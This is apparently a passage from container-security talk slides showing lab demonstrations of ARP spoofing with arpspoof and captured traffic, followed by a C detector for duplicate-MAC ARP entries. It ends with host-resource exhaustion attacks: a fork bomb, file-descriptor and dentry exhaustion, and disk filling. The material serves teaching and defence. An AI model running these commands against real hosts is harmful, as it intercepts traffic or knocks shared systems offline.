    1 packets transmitted, 1 received, 0% packet loss, time 0ms
    rtt min/avg/max/mdev = 0.070/0.070/0.070/0.000 ms

  121. ARP Spoofing
    root@test1:~# arpspoof -t 10.128.193.231 10.128.193.1 &> /dev/null &
    [1] 1619
    root@test1:~# arpspoof -t 10.128.193.1 10.128.193.231 &> /dev/null &
    [2] 1620

  122. ARP Table
    vagrant@ubuntu-xenial:~$ arp -a
    ? (10.128.193.231) at 00:16:3e:1d:73:72 [ether] on lxdbr0
    ? (10.0.2.2) at 52:54:00:12:35:02 [ether] on enp0s3
    ? (10.128.193.110) at 00:16:3e:1d:73:72 [ether] on lxdbr0
    ? (10.0.2.3) at 52:54:00:12:35:03 [ether] on enp0s3

  123. Capture packets
    root@attacker:~# tcpdump -i any -vv -w test.pcap
    vagrant@ubuntu-xenial:~/shared$ curl 10.128.193.231

  124. Look at the captured packets
    $ lxc file pull attacker/root/test.pcap ./
    $ tcpdump -X tcp port 80 -r test.pcap
    0x0000: 4500 0082 2126 4000 3f06 8267 0a80 c101 E...!&@.?..g....
    0x0010: 0a80 c1e7 8f28 0050 ebdb f6f0 89c2 03be .....(.P........
    0x0020: 8018 00e5 985d 0000 0101 080a 001b d7cb .....]..........
    0x0030: 001b d7cb 4745 5420 2f20 4854 5450 2f31 ....GET./.HTTP/1
    0x0040: 2e31 0d0a 486f 7374 3a20 3130 2e31 3238 .1..Host:.10.128
    0x0050: 2e31 3933 2e32 3331 0d0a 5573 6572 2d41 .193.231..User-A
    0x0060: 6765 6e74 3a20 6375 726c 2f37 2e34 372e gent:.curl/7.47.
    0x0070: 300d 0a41 6363 6570 743a 202a 2f2a 0d0a 0..Accept:.*/*..
    0x0080: 0d0a ..
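Added detection example, not from the slides: the host-side symptom of slides 119 and 122 is that two container IPs on lxdbr0 suddenly resolve to the same MAC. This parser reads `arp -a` output and counts such duplicate-MAC pairs per interface; the sample tables are constructed from the two slides, with an <incomplete> entry added as an edge case. Caveat: a NIC that legitimately holds several IPs produces the same signature, so treat a hit as a prompt to investigate rather than proof of spoofing.

```c
#include <stdio.h>
#include <string.h>

#define MAX_ARP 64
struct arp_entry { char ip[40], mac[20], dev[16]; };

/* Constructed from slides 119 and 122: the host's ARP table before and after arpspoof ran in
 * the attacker container. The <incomplete> line is an added edge case, not from the slides. */
const char *ARP_BEFORE =
    "? (10.128.193.231) at 00:16:3e:6a:55:5d [ether] on lxdbr0\n"
    "? (10.0.2.2) at 52:54:00:12:35:02 [ether] on enp0s3\n"
    "? (10.128.193.110) at 00:16:3e:1d:73:72 [ether] on lxdbr0\n";
const char *ARP_AFTER =
    "? (10.128.193.231) at 00:16:3e:1d:73:72 [ether] on lxdbr0\n"
    "? (10.0.2.2) at 52:54:00:12:35:02 [ether] on enp0s3\n"
    "? (10.128.193.110) at 00:16:3e:1d:73:72 [ether] on lxdbr0\n"
    "? (10.128.193.50) at <incomplete> on lxdbr0\n";

/* Parse one `arp -a` line of the form "? (IP) at MAC [ether] on DEV"; returns 1 on success */
int parse_arp_line(const char *line, struct arp_entry *e)
{
    const char *lp = strchr(line, '(');
    const char *rp = lp ? strchr(lp, ')') : NULL;
    if (lp == NULL || rp == NULL || (size_t)(rp - lp - 1) >= sizeof e->ip)
        return 0;
    memcpy(e->ip, lp + 1, (size_t)(rp - lp - 1));
    e->ip[rp - lp - 1] = '\0';
    const char *at = strstr(rp, " at ");
    const char *on = at ? strstr(at, " on ") : NULL;
    if (at == NULL || on == NULL)
        return 0;
    return sscanf(at + 4, "%19s", e->mac) == 1 && sscanf(on + 4, "%15s", e->dev) == 1;
}

/* Parse a newline-separated dump; returns the number of entries stored in out[] */
int parse_arp_table(const char *dump, struct arp_entry *out, int max)
{
    int n = 0;
    while (*dump != '\0' && n < max) {
        const char *nl = strchr(dump, '\n');
        size_t len = nl ? (size_t)(nl - dump) : strlen(dump);
        char line[160];
        if (len < sizeof line) {
            memcpy(line, dump, len);
            line[len] = '\0';
            n += parse_arp_line(line, &out[n]);
        }
        dump += nl ? len + 1 : len;
    }
    return n;
}

/* Count pairs of distinct IPs on one interface that resolve to the same MAC, the signature arpspoof
 * left on slide 122. Entries without a MAC (<incomplete>) are skipped; the first conflict is
 * written to report[] (may be NULL with rlen 0) so a monitor can log it. */
int duplicate_mac_pairs(const struct arp_entry *t, int n, char *report, size_t rlen)
{
    int pairs = 0;
    if (rlen > 0) report[0] = '\0';
    for (int i = 0; i < n; i++) {
        if (strchr(t[i].mac, ':') == NULL)
            continue;
        for (int j = i + 1; j < n; j++) {
            if (strcmp(t[i].dev, t[j].dev) != 0 || strcmp(t[i].mac, t[j].mac) != 0 ||
                strcmp(t[i].ip, t[j].ip) == 0)
                continue;
            if (pairs++ == 0 && rlen > 0)
                snprintf(report, rlen, "%s and %s both at %s on %s", t[i].ip, t[j].ip, t[i].mac, t[i].dev);
        }
    }
    return pairs;
}

/* Convenience wrapper over a whole dump */
int duplicate_mac_pairs_in(const char *dump, char *report, size_t rlen)
{
    struct arp_entry t[MAX_ARP];
    return duplicate_mac_pairs(t, parse_arp_table(dump, t, MAX_ARP), report, rlen);
}

int main(void)
{
    char r[160];
    printf("before: %d conflict(s) %s\n", duplicate_mac_pairs_in(ARP_BEFORE, r, sizeof r), r);
    printf("after:  %d conflict(s) %s\n", duplicate_mac_pairs_in(ARP_AFTER, r, sizeof r), r);
    return 0;
}
```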

  125. Other attack surfaces

  126. Reading and clearing the dmesg buffer
    root@sample1:/# dmesg
    [ 311.470895] EXT4-fs (sda1): error count since last fsck: 28
    [ 311.470928] EXT4-fs (sda1): initial error at time 1537860516:
    htree_dirblock_to_tree:986: inode 542086: block 1069691
    [ 311.470944] EXT4-fs (sda1): last error at time 1537928843:
    htree_dirblock_to_tree:986: inode 278756: block 531449

    root@06399a7a8814:/# dmesg -C
    root@06399a7a8814:/# dmesg

  127. Mass creation of negative dentries
    root@sample1:/# perl -e 'stat("/$_") for 1..100000000'
    vagrant@ubuntu-xenial:~$ sudo slabtop
    Active / Total Objects (% used) : 4172542 / 4182249 (99.8%)
    Active / Total Slabs (% used) : 197606 / 197606 (100.0%)
    Active / Total Caches (% used) : 78 / 122 (63.9%)
    Active / Total Size (% used) : 790487.34K / 794654.96K (99.5%)
    Minimum / Average / Maximum Object : 0.01K / 0.19K / 8.00K
    OBJS ACTIVE USE OBJ SIZE SLABS OBJ/SLAB CACHE SIZE NAME
    4050564 4050564 100% 0.19K 192884 21 771536K dentry

  128. Mass creation of file descriptors
    • There is an upper limit on the number of file descriptors that can be opened; it can be checked in /proc/sys/fs/file-max.
    • If a process inside the container opens that many file descriptors, the host side is affected too when the uid is shared.
    #include <fcntl.h>
    #include <stdio.h>

    int main(void) {
      char buf[32];
      int i;
      // keep opening files until open(2) fails
      for (i = 0; i < 99198; i++) {
        sprintf(buf, "/tmp/%d", i);
        int fd = open(buf, O_CREAT | O_RDWR, 0600);
        if (fd == -1) {
          printf("max fd %d\n", i);
          break;
        }
      }
      for (;;); // hold the descriptors open
    }

  129. fork bomb
    $ :(){ :|: & };:
    $ for i in {1..9999}; do sleep infinity & done

  130. Disk capacity
    $ fallocate -l 20g big_file
    • If the container has no disk quota, creating large files can exhaust the host's disk space.
    $ dd if=/dev/zero of=tempfile bs=20GB count=10

  131. Summary

  132. Summary
    • Linux containers are protected by multiple security mechanisms
    • Swiss cheese model (ex. even if seccomp is defeated, Capabilities remain)
    • A misconfiguration lets a container affect the host and other containers
    • LXC, Docker and the like ship default settings that block these attacks
    • But there might still be gaps
    • CVE

  133. Why not work at Pepabo too?
    Check the latest recruiting information → @pb_recruit